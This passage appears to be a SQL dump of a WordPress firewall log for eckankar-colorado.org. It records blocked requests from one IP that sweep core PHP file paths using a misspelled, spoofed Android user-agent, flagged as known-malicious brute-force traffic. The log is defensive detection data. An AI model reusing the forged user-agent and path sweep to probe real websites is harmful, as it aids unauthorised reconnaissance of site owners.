User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWN1c3RvbS1iYWNrZ3JvdW5kLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133415,1699888612.677048,1699888612.668100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/ajax-actions.php','http://eckankar-colorado.org/wp-admin/includes/ajax-actions.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2FqYXgtYWN0aW9ucy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133399,1699888618.916606,1699888618.907000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-plugin-installer-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-plugin-installer-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXBsdWdpbi1pbnN0YWxsZXItc2tpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133433,1699888603.904712,1699888603.896100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-tag-cloud.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-tag-cloud.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXRhZy1jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133434,1699888603.566458,1699888603.557800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-search.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-search.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXNlYXJjaC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133439,1699888601.862647,1699888601.853300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-meta.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-meta.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1ldGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133440,1699888601.520968,1699888601.512300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133436,1699888602.886429,1699888602.877800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-recent-posts.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-recent-posts.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXJlY2VudC1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133376,1699888627.143308,1699888627.134300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-list-table-compat.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-list-table-compat.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWxpc3QtdGFibGUtY29tcGF0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133377,1699888626.799792,1699888626.790900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-links-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-links-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWxpbmtzLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133581,1699888547.022311,1699888547.012900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/post-formats.php','http://eckankar-colorado.org/wp-includes/post-formats.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Bvc3QtZm9ybWF0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133349,1699888636.538716,1699888636.529900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/credits.php','http://eckankar-colorado.org/wp-admin/includes/credits.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NyZWRpdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133364,1699888631.304333,1699888631.295300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-privacy-policy-content.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-privacy-policy-content.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXByaXZhY3ktcG9saWN5LWNvbnRlbnQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133365,1699888630.927746,1699888630.918700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXByaXZhY3ktZGF0YS1yZW1vdmFsLXJlcXVlc3RzLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133597,1699888540.789435,1699888540.780800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-blogs.php','http://eckankar-colorado.org/wp-includes/ms-blogs.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLWJsb2dzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133357,1699888633.840040,1699888633.830900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-theme-install-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-theme-install-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWluc3RhbGwtbGlzdC10YWJsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133417,1699888611.926178,1699888611.917300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/admin-filters.php','http://eckankar-colorado.org/wp-admin/includes/admin-filters.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2FkbWluLWZpbHRlcnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133371,1699888628.824765,1699888628.815900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-ms-users-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-ms-users-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLW1zLXVzZXJzLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133372,1699888628.494111,1699888628.485200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-ms-themes-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-ms-themes-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLW1zLXRoZW1lcy1saXN0LXRhYmxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133573,1699888549.781156,1699888549.772500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/revision.php','http://eckankar-colorado.org/wp-includes/revision.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3JldmlzaW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133572,1699888550.145728,1699888550.136700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rewrite.php','http://eckankar-colorado.org/wp-includes/rewrite.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jld3JpdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133571,1699888550.615658,1699888550.593800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/robots-template.php','http://eckankar-colorado.org/wp-includes/robots-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3JvYm90cy10ZW1wbGF0ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133567,1699888552.046307,1699888552.037700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/session.php','http://eckankar-colorado.org/wp-includes/session.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Nlc3Npb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133568,1699888551.715038,1699888551.706300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/script-loader.php','http://eckankar-colorado.org/wp-includes/script-loader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NjcmlwdC1sb2FkZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133570,1699888550.956283,1699888550.947700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rss-functions.php','http://eckankar-colorado.org/wp-includes/rss-functions.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jzcy1mdW5jdGlvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133569,1699888551.333070,1699888551.318800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rss.php','http://eckankar-colorado.org/wp-includes/rss.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 